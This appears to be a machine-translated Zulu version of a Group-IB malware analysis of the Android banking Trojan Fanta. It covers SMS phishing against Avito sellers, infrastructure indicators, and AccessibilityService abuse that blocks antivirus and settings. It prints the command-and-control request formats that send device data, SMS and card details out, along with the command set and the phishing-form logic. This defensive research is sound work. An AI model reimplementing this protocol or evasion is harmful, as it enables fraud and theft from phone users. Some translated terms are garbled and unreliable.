Ngolunye usuku ufuna ukuthengisa okuthile ku-Avito futhi, ngemva kokufaka incazelo eningiliziwe yomkhiqizo wakho (isibonelo, imojula ye-RAM), uzothola lo mlayezo:
Uma usuvula isixhumanisi, uzobona ikhasi elibonakala lingenacala elikwazisa, umdayisi ojabule nophumelelayo, ukuthi ukuthengwa sekuthengiwe:
Uma usuchofoze inkinobho ethi "Qhubeka", ifayela le-APK elinesithonjana negama elikhuthaza ukwethenjwa lizolandwa kudivayisi yakho ye-Android. Ufake uhlelo lokusebenza ngesizathu esithile olucele amalungelo e-AccessibilityService, kwase kuvela amawindi ambalwa anyamalala ngokushesha futhi... Yilokho kuphela.
Uya ukuyohlola ibhalansi yakho, kodwa ngesizathu esithile uhlelo lwakho lokusebenza lwasebhange lucela imininingwane yekhadi lakho futhi. Ngemva kokufaka idatha, kwenzeka okuthile okubi: ngesizathu esithile namanje ongakacaci kuwe, imali iqala ukunyamalala ku-akhawunti yakho. Uzama ukuxazulula inkinga, kodwa ifoni yakho iyamelana: icindezela izinkinobho "Emuva" kanye "Nekhaya", ayivali futhi ayikuvumeli ukuthi wenze kusebenze noma yiziphi izinyathelo zokuphepha. Ngenxa yalokho, ushiywe ngaphandle kwemali, izimpahla zakho azizange zithengwe, udidekile futhi uzibuze: kwenzekeni?
Impendulo ilula: usuphenduke isisulu se-Android Trojan Fanta, ilungu lomndeni wakwaFlexnet. Kwenzeka kanjani lokhu? Ake sichaze manje.
Ababhali: U-Andrey Polovinkin, uchwepheshe omncane wokuhlaziya uhlelo olungayilungele ikhompuyutha, U-Ivan Pisarev, uchwepheshe wokuhlaziya uhlelo olungayilungele ikhompuyutha.
Izibalo ezithile
Umndeni wakwaFlexnet we-Android Trojans waqala ukwaziwa emuva ngo-2015. Esikhathini eside impela sokusebenza, umndeni wanda waba yizinhlobo ezimbalwa ezingaphansi: iFanta, iLimebot, iLipton, njll. I-Trojan, kanye nengqalasizinda ehlotshaniswa nayo, ayimile: izinhlelo ezintsha zokusabalalisa ezisebenzayo ziyathuthukiswa - kithi, amakhasi obugebengu bokweba imininingwane ebucayi ahloselwe umthengisi othize wabasebenzisi, futhi abathuthukisi beTrojan balandela amathrendi asemfashinini. ukubhalwa kwegciwane - ukwengeza ukusebenza okusha okwenza kube nokwenzeka ukweba imali ngokuphumelelayo kumadivayisi angenwe yileli gciwane futhi kudlule izindlela zokuvikela.
Umkhankaso ochazwe kulesi sihloko uqondiswe kubasebenzisi abavela e-Russia; inombolo encane yamadivayisi anegciwane aqoshwa e-Ukraine, futhi ambalwa nakakhulu e-Kazakhstan nase-Belarus.
Ngisho noma i-Flexnet isineminyaka engaphezu kwengu-4 isendaweni ye-Android Trojan futhi isifundwe kabanzi ngabacwaningi abaningi, isesimeni esihle. Kusukela ngoJanuwari 2019, inani lomonakalo elingaba khona lingaphezu kwama-ruble ayizigidi ezingama-35 - futhi lokhu kungokwamikhankaso eRussia. Ngo-2015, izinguqulo ezihlukahlukene zale Trojan ye-Android zathengiswa ezinkundleni ezingaphansi komhlaba, lapho ikhodi yomthombo yeTrojan enencazelo enemininingwane ingatholakala futhi. Lokhu kusho ukuthi izibalo zomonakalo emhlabeni zihlaba umxhwele nakakhulu. Akuyona inkomba embi kumuntu omdala kangaka, akunjalo?
Ukusuka ekuthengisweni kuya ekukhohliseni
Njengoba kungabonwa esithombeni-skrini esethulwe ngaphambilini sekhasi lobugebengu bokweba imininingwane ebucayi lesevisi ye-inthanethi yokuthumela izikhangiso ze-Avito, lilungiselwe isisulu esithile. Ngokusobala, abahlaseli basebenzisa omunye wabahlaziyi be-Avito, okhipha inombolo yocingo negama lomdayisi, kanye nencazelo yomkhiqizo. Ngemva kokwandisa ikhasi nokulungisa ifayela le-APK, isisulu sithunyelelwa i-SMS enegama lakhe kanye nesixhumanisi sekhasi lobugebengu bokweba imininingwane ebucayi eliqukethe incazelo yomkhiqizo wakhe kanye nenani elitholwe “ekudayisweni” komkhiqizo. Ngokuchofoza inkinobho, umsebenzisi uthola ifayela le-APK eliyingozi - Fanta.
Ucwaningo lwesizinda se-shcet491[.]ru lubonise ukuthi ludluliselwe kumaseva e-DNS ka-Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Ifayela lezoni yesizinda liqukethe okufakiwe okukhomba kumakheli e-IP 31.220.23[.]236, 31.220.23[.]243, kanye no-31.220.23[.]235. Nokho, irekhodi lensiza eyinhloko yesizinda (Irekhodi) likhomba kuseva enekheli le-IP 178.132.1[.]240.
Ikheli lasesizindeni se-inthanethi 178.132.1[.]240 litholakala e-Netherlands futhi lingelomsingathi I-WorldStream. Amakheli e-IP 31.220.23[.]235, 31.220.23[.]236 kanye no-31.220.23[.]243 atholakala e-UK futhi angaweseva yokubamba okwabelwana ngayo i-HOSTINGER. Isetshenziswa njengerekhoda i-openprov-ru. Izizinda ezilandelayo ziphinde zaxazululwa kukheli le-IP 178.132.1[.]240:
- sdelka-ru[.]ru
- i-tovar-av[.]ru
- i-av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Kufanele kuqashelwe ukuthi izixhumanisi ngendlela elandelayo bezitholakala cishe kuzo zonke izizinda:
http://(www.){0,1}<%domain%>/[0-9]{7}
Lesi sifanekiso sihlanganisa nesixhumanisi esivela kumlayezo we-SMS. Ngokusekelwe kudatha yomlando, kutholwe ukuthi isizinda esisodwa sihambisana nezixhumanisi eziningana kuphethini echazwe ngenhla, ebonisa ukuthi isizinda esisodwa sasetshenziselwa ukusabalalisa iTrojan kuzisulu eziningana.
Asigxumele phambili kancane: iTrojani elandiwe ngesixhumanisi esivela ku-SMS isebenzisa ikheli njengeseva yokulawula. onuseseddohap[.]club. Lesi sizinda sibhaliswe ngo-2019-03-12, futhi kusukela ngomhla ka-2019-04-29, izinhlelo zokusebenza ze-APK zihlanganyele nalesi sizinda. Ngokusekelwe kudatha etholwe ku-VirusTotal, inani lezinhlelo zokusebenza eziyi-109 ezihlanganyele nale seva. Isizinda ngokwaso sixazululwe ekhelini le-IP 217.23.14[.]27, etholakala eNetherlands futhi ephethwe umninikhaya I-WorldStream. Isetshenziswa njengerekhoda igama. Izizinda ziphinde zaxazululwa kuleli kheli le-IP i-bad-racoon[.]iklabhu (kusukela ngo-2018-09-25) futhi i-bad-racoon[.]bukhoma (kusukela ngo-2018-10-25). Ngesizinda i-bad-racoon[.]iklabhu amafayela we-APK angaphezu kuka-80 okuxhunywe nawo i-bad-racoon[.]bukhoma - ezingaphezu kuka-100.
Ngokuvamile, ukuhlasela kuqhubeka kanje:
Yini engaphansi kwesivalo sikaFanta?
Njengamanye ama-Trojan amaningi e-Android, i-Fanta iyakwazi ukufunda nokuthumela imilayezo ye-SMS, yenze izicelo ze-USSD, futhi ibonise amafasitela ayo phezu kwezinhlelo zokusebenza (kuhlanganise namabhange). Kodwa-ke, i-arsenal yokusebenza kwalo mndeni isifikile: I-Fanta yaqala ukuyisebenzisa Isevisi yokufinyeleleka ngezinhloso ezahlukahlukene: ukufunda okuqukethwe kwezaziso kwezinye izinhlelo zokusebenza, ukuvimbela ukutholwa nokumisa ukwenziwa kweTrojan kudivayisi ethelelekile, njll. I-Fanta isebenza kuzo zonke izinguqulo ze-Android ezingaphansi kuka-4.4. Kulesi sihloko sizobhekisisa isampula ye-Fanta elandelayo:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Ngokushesha ngemva kokwethulwa
Ngokushesha ngemva kokwethulwa, iTrojan ifihla isithonjana sayo. Uhlelo lokusebenza lungasebenza kuphela uma igama ledivayisi enegciwane lingekho ohlwini:
- android_x86
- VirtualBox
- I-Nexus 5X(ikhanda lenkunzi)
- I-Nexus 5(insingo)
Lokhu kuhlola kwenziwa enkonzweni eyinhloko yeTrojan - Isevisi Eyinhloko. Lapho yethulwa okokuqala ngqa, imingcele yokumisa yohlelo lokusebenza iqalwa kumanani azenzakalelayo (ifomethi yokugcina idatha yokumisa nencazelo yayo kuzoxoxwa ngayo kamuva), futhi idivayisi entsha ethelelekile ibhaliswe kuseva yokulawula. Isicelo se-HTTP POST esinohlobo lomlayezo sizothunyelwa kuseva bhalisa_bot kanye nolwazi mayelana nedivayisi ethelelekile (inguqulo ye-Android, i-IMEI, inombolo yocingo, igama lika-opharetha kanye nekhodi yezwe lapho u-opharetha abhaliswe khona). Ikheli lisebenza njengeseva yokulawula hXXp://onuseseddohap[.]club/controller.php. Iphendula, iseva ithumela umlayezo oqukethe izinkambu bot_id, bot_pwd, Iseva - uhlelo lokusebenza lugcina la manani njengamapharamitha weseva ye-CnC. Ipharamitha Iseva ngokuzithandela uma inkambu ingatholwanga: UFanta usebenzisa ikheli lokubhalisa - hXXp://onuseseddohap[.]club/controller.php. Umsebenzi wokushintsha ikheli le-CnC ungasetshenziswa ukuxazulula izinkinga ezimbili: ukusabalalisa umthwalo ngokulinganayo phakathi kwamaseva amaningana (uma kunenombolo enkulu yamadivayisi angenwe yileli gciwane, umthwalo kuseva yewebhu engalungiselelwe ungaba phezulu), kanye nokusebenzisa. enye iseva esimweni sokwehluleka kwesinye seziphakeli ze-CnC .
Uma kwenzeka iphutha ngenkathi kuthunyelwa isicelo, i-Trojan izophinda inqubo yokubhalisa ngemva kwemizuzwana engu-20.
Uma idivayisi isibhaliswe ngempumelelo, i-Fanta izobonisa umlayezo olandelayo kumsebenzisi:
Inothi elibalulekile: isevisi ibizwa Ukuphepha kwesistimu - igama lesevisi yeThrojani, nangemva kokuchofoza inkinobho Kulungile Iwindi lizovuleka elinezilungiselelo zokufinyeleleka zedivayisi ethelelekile, lapho umsebenzisi kufanele anikeze amalungelo okufinyelela esevisi enonya:
Ngokushesha lapho umsebenzisi evula Isevisi yokufinyeleleka, i-Fanta ithola ukufinyelela kokuqukethwe amawindi ohlelo lokusebenza kanye nezenzo ezenziwa kuwo:
Ngokushesha ngemva kokuthola amalungelo okufinyelela, i-Trojan icela amalungelo omlawuli namalungelo okufunda izaziso:
Ngokusebenzisa i-AccessibilityService, uhlelo lokusebenza lilingisa ukuchofoza izinkinobho, ngaleyo ndlela lizinikeze wonke amalungelo adingekayo.
I-Fanta idala izimo zesizindalwazi eziningi (ezizochazwa kamuva) ezidingekayo ukuze kugcinwe idatha yokumisa, kanye nolwazi oluqoqwe ngenqubo mayelana nedivayisi ethelelekile. Ukuze uthumele ulwazi oluqoqiwe, iTrojan idala umsebenzi ophindayo oklanyelwe ukulanda izinkambu kusizindalwazi futhi yamukele umyalo ovela kuseva yokulawula. Isikhathi sokufinyelela ku-CnC sisethwa kuye ngenguqulo ye-Android: esimweni esingu-5.1, isikhawu sizoba amasekhondi angu-10, ngaphandle kwalokho amasekhondi angu-60.
Ukwamukela umyalo, uFanta wenza isicelo GetTask kuseva yokuphatha. Ukuphendula, i-CnC ingathumela omunye wemiyalo elandelayo:
| Ithimba | Incazelo |
|---|---|
| 0 | Thumela umlayezo we-SMS |
| 1 | Shaya ucingo noma umyalo we-USSD |
| 2 | Ibuyekeza ipharamitha isikhathi |
| 3 | Ibuyekeza ipharamitha thinta |
| 6 | Ibuyekeza ipharamitha smsManager |
| 9 | Qala ukuqoqa imilayezo ye-SMS |
| 11 | Setha kabusha ifoni yakho kumasethingi asembonini |
| 12 | Nika amandla/Khubaza ukungena kokudalwa kwebhokisi lengxoxo |
I-Fanta iphinde iqoqe izaziso ezivela ezinhlelweni zokusebenza zasebhange ezingu-70, izinhlelo zokukhokha ngokushesha nama-e-wallet futhi izigcine kusizindalwazi.
Igcina imingcele yokumisa
Ukugcina amapharamitha wokumisa, i-Fanta isebenzisa indlela evamile yeplathifomu ye-Android - Okuncamelayo-amafayela. Izilungiselelo zizolondolozwa efayeleni eliqanjwe igama izilungiselelo. Incazelo yamapharamitha alondoloziwe ikuthebula elingezansi.
| Имя | Inani elizenzakalelayo | Amanani angenzeka | Incazelo |
|---|---|---|---|
| id | 0 | Integer | I-ID ye-Bot |
| Iseva | hXXp://onuseseddohap[.]club/ | I-URL | Lawula ikheli leseva |
| pwd | - | Umzila | Iphasiwedi yeseva |
| isikhathi | 20 | Integer | Isikhathi sokuphumula. Ibonisa ukuthi le misebenzi elandelayo kufanele ihlehliswe isikhathi esingakanani:
|
| thinta | konke | konke/inombolo yocingo | Uma inkambu ilingana neyunithi yezinhlamvu konke noma inombolo, bese umlayezo we-SMS owamukelwe uzovinjwa uhlelo lokusebenza futhi ungaboniswa kumsebenzisi |
| smsManager | 0 | 0/1 | Nika amandla/khubaza uhlelo lokusebenza njengomamukeli we-SMS ozenzakalelayo |
| fundaDialog | bamanga | Iqiniso/amanga | Nika amandla/Khubaza ukuloga komcimbi AccessibilityEvent |
UFanta naye usebenzisa ifayela smsManager:
| Имя | Inani elizenzakalelayo | Amanani angenzeka | Incazelo |
|---|---|---|---|
| pckg | - | Umzila | Igama lomphathi womlayezo we-SMS elisetshenzisiwe |
Ukusebenzisana nezingosi zolwazi
Ngesikhathi sokusebenza kwayo, iTrojan isebenzisa imininingwane emibili. Isizindalwazi esiqanjwe a esetshenziswa ukugcina imininingwane ehlukahlukene eqoqwe ocingweni. I-database yesibili ibizwa ifanta.db futhi isetshenziselwa ukulondoloza izilungiselelo ezinesibopho sokudala amawindi obugebengu bokweba imininingwane ebucayi aklanyelwe ukuqoqa ulwazi mayelana namakhadi asebhange.
I-Trojan isebenzisa i-database а ukugcina ulwazi oluqoqiwe bese ufaka izenzo zakho. Idatha igcinwa kuthebula izingodo. Ukwakha ithebula, sebenzisa lo mbuzo we-SQL olandelayo:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Isizindalwazi siqukethe ulwazi olulandelayo:
1. Ukungena ukuqaliswa kwedivayisi enegciwane ngomlayezo Ifoni ivuliwe!
2. Izaziso ezivela ezinhlelweni zokusebenza. Umlayezo ukhiqizwa ngokuya kwesifanekiso esilandelayo:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Idatha yekhadi lasebhange evela kumafomu obugebengu bokweba imininingwane ebucayi adalwe iTrojan. Ipharamitha VIEW_NAME kungaba okukodwa kokulandelayo:
- AliExpress
- I-Avito
- -Google Play
- Okuxubile <%App Name%>
Umlayezo ungene ngefomethi:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Imilayezo ye-SMS engenayo/ephumayo ngefomethi:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Ulwazi mayelana nephakheji elidala ibhokisi lengxoxo ngefomethi:
(<%Package name%>)<%Package information%>
Ithebula lesibonelo izingodo:
Omunye wemisebenzi ye-Fanta ukuqoqwa kolwazi mayelana namakhadi asebhange. Ukuqoqwa kwedatha kwenzeka ngokwakhiwa kwamawindi obugebengu bokweba imininingwane ebucayi lapho kuvulwa izinhlelo zokusebenza zokubhanga. I-Trojan idala iwindi lobugebengu bokweba imininingwane ebucayi kanye kuphela. Ulwazi olukhonjiswe iwindi kumsebenzisi lulondolozwe kuthebula izilungiselelo ku-database ifanta.db. Ukwakha isizindalwazi, sebenzisa lo mbuzo we-SQL olandelayo:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Zonke izinkambu zethebula izilungiselelo ngokuzenzakalelayo kuqaliswe ku-1 (dala iwindi lobugebengu bokweba imininingwane ebucayi). Ngemva kokuba umsebenzisi efake idatha yakhe, inani lizosethwa ukuze lithi 0. Isibonelo sezinkambu zethebula izilungiselelo:
- anga_ngena — inkundla inesibopho sokubonisa ifomu lapho uvula isicelo sasebhange
- ibhange_lokuqala - ayisetshenziswa
- can_avito - Inkambu inesibopho sokubonisa ifomu lapho uvula uhlelo lwe-Avito
- anga_ali - Inkambu inesibopho sokubonisa ifomu lapho uvula uhlelo lwe-Aliexpress
- kungaba_enye - Inkambu inesibopho sokubonisa ifomu lapho ivula noma yiluphi uhlelo lokusebenza ohlwini: Yula, Pandao, Drom Auto, Wallet. Amakhadi esaphulelo nebhonasi, Aviasales, Ukubhuka, Trivago
- can_card — Inkambu inesibopho sokuveza ifomu lapho ivula -Google Play
Ukusebenzisana nesiphakeli sokuphatha
Ukusebenzisana kwenethiwekhi neseva yokuphatha kwenzeka ngephrothokholi ye-HTTP. Ukuze isebenze nenethiwekhi, i-Fanta isebenzisa umtapo wezincwadi odumile we-Retrofit. Izicelo zithunyelwa ku: hXXp://onuseseddohap[.]club/controller.php. Ikheli leseva lingashintshwa lapho kubhaliswa kuseva. Amakhukhi angase athunyelwe ngokuphendula kusuka kuseva. I-Fanta yenza izicelo ezilandelayo kuseva:
- Ukubhaliswa kwe-bot kuseva yokulawula kwenzeka kanye, lapho yethulwa okokuqala. Idatha elandelayo mayelana nedivayisi enegciwane ithunyelwa kuseva:
· Cookie - amakhukhi atholwe kuseva (inani elizenzakalelayo liwuchungechunge olungenalutho)
· imodi — intambo engaguquki bhalisa_bot
· isimaphambili - inani elingaguquki 2
· inguqulo_sdk - yakhiwe ngokulandela isifanekiso esilandelayo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI - I-IMEI yedivayisi enegciwane
· izwe - Ikhodi yezwe lapho u-opharetha abhaliswe khona, ngefomethi ye-ISO
· inombolo - inombolo yocingo
· Opharetha - igama lomsebenzisiIsibonelo sesicelo esithunyelwe kuseva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Ekuphenduleni isicelo, iseva kufanele ibuyisele into ye-JSON equkethe amapharamitha alandelayo:
· bot_id - I-ID yedivayisi ethelelekile. Uma i-bot_id ilingana no-0, i-Fanta izophinda isebenzise isicelo.
bot_pwd — iphasiwedi yeseva.
iseva — lawula ikheli leseva. Ipharamitha yokuzikhethela. Uma ipharamitha ingacacisiwe, ikheli elilondolozwe kuhlelo lokusebenza lizosetshenziswa.Isibonelo sento ye-JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Isicelo sokuthola umyalo ovela kuseva. Idatha elandelayo ithunyelwa kuseva:
· Cookie — amakhukhi atholwe kwiseva
· ibhidi - i-id yedivayisi ethelelekile eyamukelwe ngesikhathi kuthunyelwa isicelo bhalisa_bot
· pwd -iphasiwedi yeseva
· divice_admin - inkambu inquma ukuthi amalungelo omlawuli atholiwe yini. Uma amalungelo omlawuli etholiwe, inkambu ilingana ne 1, kungenjalo 0
· uMhloli - Isimo sokusebenza kwesevisi yokufinyeleleka. Uma isevisi iqalisiwe, inani liwukuthi 1, kungenjalo 0
· SMSManager — ikhombisa ukuthi ingabe iTrojan ivuliwe njengohlelo oluzenzakalelayo lokuthola i-SMS
· isikrini — ibonisa ukuthi isikrini sikusiphi isimo. Inani lizosethwa 1, uma isikrini sivuliwe, kungenjalo 0;Isibonelo sesicelo esithunyelwe kuseva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Kuye ngomyalo, iseva ingabuyisela into ye-JSON ngamapharamitha ahlukene:
· Ithimba Thumela umlayezo we-SMS: Amapharamitha aqukethe inombolo yocingo, umbhalo womlayezo we-SMS kanye ne-ID yomlayezo othunyelwayo. Isihlonzi sisetshenziswa uma kuthunyelwa umlayezo kwiseva enohlobo setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Ithimba Shaya ucingo noma umyalo we-USSD: Inombolo yocingo noma umyalo ungena emzimbeni wokuphendula.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Ithimba Shintsha ipharamitha yesikhawu.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Ithimba Shintsha ipharamitha yokunqamula.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Ithimba Shintsha inkambu ye-SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Ithimba Qoqa imilayezo ye-SMS kusuka kudivayisi ethelelekile.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Ithimba Setha kabusha ifoni yakho kumasethingi asembonini:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Ithimba Shintsha ipharamitha ye-ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Ukuthumela umlayezo onohlobo setSmsStatus. Lesi sicelo senziwa ngemva kokuba umyalo usukhishiwe Thumela umlayezo we-SMS. Isicelo sibukeka kanje:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Ilayisha okuqukethwe kusizindalwazi. Umugqa owodwa udluliselwa ngesicelo ngasinye. Idatha elandelayo ithunyelwa kuseva:
· Cookie — amakhukhi atholwe kwiseva
· imodi — intambo engaguquki setSaveInboxSms
· ibhidi - i-id yedivayisi ethelelekile eyamukelwe ngesikhathi kuthunyelwa isicelo bhalisa_bot
· umbhalo - umbhalo kurekhodi lamanje lesizindalwazi (inkambu d etafuleni izingodo ku-database а)
· inombolo - Igama lerekhodi lesizindalwazi samanje (inkambu p etafuleni izingodo ku-database а)
· imodi_ye-sms - inani eliphelele (inkambu m etafuleni izingodo ku-database а)Isicelo sibukeka kanje:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Uma ithunyelwe ngempumelelo kuseva, umugqa uzosuswa etafuleni. Isibonelo sento ye-JSON ebuyiswe iseva:
{ "response":[], "status":"ok" }
Ukusebenzisana ne-AccessibilityService
I-AccessibilityService yasetshenziswa ukuze kwenziwe amadivayisi e-Android asebenziseke kalula kubantu abakhubazekile. Ezimweni eziningi, ukuxhumana ngokomzimba kuyadingeka ukuze uhlanganyele nohlelo lokusebenza. I-AccessibilityService ikuvumela ukuthi uzenze ngokohlelo. I-Fanta isebenzisa isevisi ukuze idale amawindi amanga kuzinhlelo zokusebenza zebhange futhi ivimbele abasebenzisi ukuthi bavule izilungiselelo zesistimu nezinye izinhlelo zokusebenza.
Isebenzisa ukusebenza kwe-AccessibilityService, i-Trojan iqapha izinguquko ezicini ezikusikrini sedivayisi ethelelekile. Njengoba kuchazwe ngaphambilini, izilungiselelo ze-Fanta ziqukethe ipharamitha enesibopho sokungena ngemvume ngamabhokisi ezingxoxo - fundaDialog. Uma le pharamitha isethiwe, ulwazi olumayelana negama nencazelo yephakheji ebangele umcimbi izongezwa kusizindalwazi. I-Trojan yenza lezi zenzo ezilandelayo lapho imicimbi icushwa:
- Ilingisa ukucindezela okhiye basemuva nabasekhaya ezimweni ezilandelayo:
· uma umsebenzisi efuna ukuqalisa kabusha idivayisi yakhe
· uma umsebenzisi efuna ukususa uhlelo lwe-“Avito” noma aguqule amalungelo okufinyelela
· uma kukhulunywa ngohlelo lokusebenza lwe- "Avito" ekhasini
· uma uvula uhlelo lokusebenza lwe-Google Play Protect
· lapho uvula amakhasi anezilungiselelo ze-AccessibilityService
· lapho kuvela ibhokisi lengxoxo Lokuphepha Kwesistimu
· lapho uvula ikhasi ngezilungiselelo zokuthi “Dweba phezu kolunye uhlelo lokusebenza”
· lapho uvula ikhasi elithi “Izinhlelo zokusebenza”, “Ukutholwa nokusetha kabusha”, “Ukusethwa kabusha kwedatha”, “Setha kabusha izilungiselelo”, “Iphaneli yonjiniyela”, “Okukhethekile. amathuba”, “Amathuba akhethekile”, “Amalungelo akhethekile”
· uma umcimbi ukhiqizwe izinhlelo zokusebenza ezithile.Uhlu lwezinhlelo zokusebenza
- android
- I-Master Lite
- Hlanza inkosi
- Hlanza i-Master ye-x86 CPU
- Ukuphathwa Kwemvume Yesicelo se-Meizu
- Ukuphepha kwe-MIUI
- I-Clean Master - I-Antivirus & Inqolobane kanye nesicoci sikadoti
- Izilawuli zabazali ne-GPS: Kaspersky SafeKids
- I-Kaspersky Antivirus AppLock & Web Security Beta
- Isicoci seVirus, i-Antivirus, Isicoci (MAX Security)
- I-Mobile AntiVirus Security PRO
- I-antivirus ye-Avast nokuvikelwa kwamahhala 2019
- I-Mobile Security MegaFon
- Ukuvikelwa kwe-AVG kwe-Xperia
- Ukuphepha Kweselula
- I-Malwarebytes Antivirus & Protection
- I-Antivirus ye-Android 2019
- I-Security Master - I-Antivirus, i-VPN, i-AppLock, i-Booster
- I-antivirus ye-AVG ye-Huawei tablet System Manager
- Ukufinyeleleka kwe-Samsung
- I-Samsung Smart Manager
- Umphathi Wezokuphepha
- Ijubane Lokulekelela
- UDktWeb
- UDkt Web Security Space
- I-Dr.Web Mobile Control Center
- UDkt.Web Security Space Life
- I-Dr.Web Mobile Control Center
- Unqulo wesi arab nokuphepha kweselula
- I-Kaspersky Internet Security: I-Antivirus kanye Nokuvikelwa
- I-Kaspersky Battery Life: I-Saver & Booster
- Kaspersky Endpoint Security - ukuvikelwa kanye nokuphathwa
- I-AVG Antivirus yamahhala ka-2019 - Ukuvikelwa kwe-Android
- I-antivirus Android
- Norton Mobile Security and Antivirus
- I-antivirus, i-firewall, i-VPN, ukuphepha kweselula
- Ukuphepha Kweselula: i-antivirus, i-VPN, ukuvikelwa kobugebengu
- I-antivirus ye-Android
- Uma imvume iceliwe lapho kuthunyelwa umlayezo we-SMS enombolweni emfushane, u-Fanta ulingisa ukuchofoza ibhokisi lokuhlola Khumbula ukukhetha kanye nenkinobho thumela.
- Uma uzama ukuthatha amalungelo omlawuli ku-Trojan, ikhiya isikrini sefoni.
- Ivimbela ukungeza abalawuli abasha.
- Uma uhlelo lokusebenza lwe-antivirus dr.web ithole usongo, u-Fanta ulingisa ngokucindezela inkinobho nganaki.
- I-Trojan ilingisa ukucindezela inkinobho yangemuva nekhaya uma umcimbi ukhiqizwe uhlelo lokusebenza I-Samsung Device Care.
- I-Fanta idala amawindi obugebengu bokweba imininingwane ebucayi ngamafomu okufaka ulwazi olumayelana namakhadi asebhange uma ngabe isicelo esivela kuhlu lwezinsizakalo ze-inthanethi ezihlukene ezingaba ngu-30 zethulwe. Phakathi kwazo: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, njll.
Amafomu obugebengu bokweba imininingwane ebucayi
I-Fanta ihlaziya ukuthi yiziphi izinhlelo zokusebenza ezisebenza kudivayisi ethelelekile. Uma isicelo senzuzo sivuliwe, i-Trojan ibonisa iwindi lobugebengu bokweba imininingwane ebucayi ngaphezu kwazo zonke ezinye, okuyifomu lokufaka ulwazi lwekhadi lasebhange. Umsebenzisi kufanele afake idatha elandelayo:
- Inombolo yekhadi
- Usuku lokuphelelwa yisikhathi kwekhadi
- I-CVV
- Igama lomnikazi wekhadi (hhayi lawo wonke amabhange)
Kuye ngohlelo lokusebenza olusebenzayo, amawindi ahlukene obugebengu bokweba imininingwane ebucayi azoboniswa. Ngezansi kunezibonelo zezinye zazo:
I-Aliexpress:
I-Avito:
Kwezinye izinhlelo zokusebenza, isb. I-Google Play Market, Aviasales, Pandao, Booking, Trivago:
Kwakunjani ngempela
Ngenhlanhla, umuntu othole umlayezo we-SMS ochazwe ekuqaleni kwalesi sihloko uphenduke uchwepheshe we-cybersecurity. Ngakho-ke, inguqulo yangempela, engeyona yomqondisi ihluke kuleyo eshiwo ngaphambili: umuntu wathola i-SMS ethakazelisayo, ngemva kwalokho wayinika ithimba le-Group-IB Threat Hunting Intelligence. Umphumela wokuhlasela yilesi sihloko. Isiphetho esihle, akunjalo? Kodwa-ke, akuzona zonke izindaba eziphela ngempumelelo, futhi ukuze eyakho ingabonakali njengokusikwa komqondisi ngokulahlekelwa yimali, ezimweni eziningi kwanele ukunamathela kule mithetho echazwe isikhathi eside:
- ungafaki izinhlelo zokusebenza zedivayisi yeselula ene-Android OS kusuka kunoma iyiphi imithombo ngaphandle kwe-Google Play
- Lapho ufaka isicelo, naka ngokukhethekile amalungelo acelwe uhlelo lokusebenza
- qaphela izandiso zamafayela alandiwe
- faka izibuyekezo ze-Android OS njalo
- ungavakasheli izinsiza ezisolisayo futhi ungalandi amafayela kusuka lapho
- Ungachofozi izixhumanisi ezitholwe emilayezweni ye-SMS.
Source: www.habr.com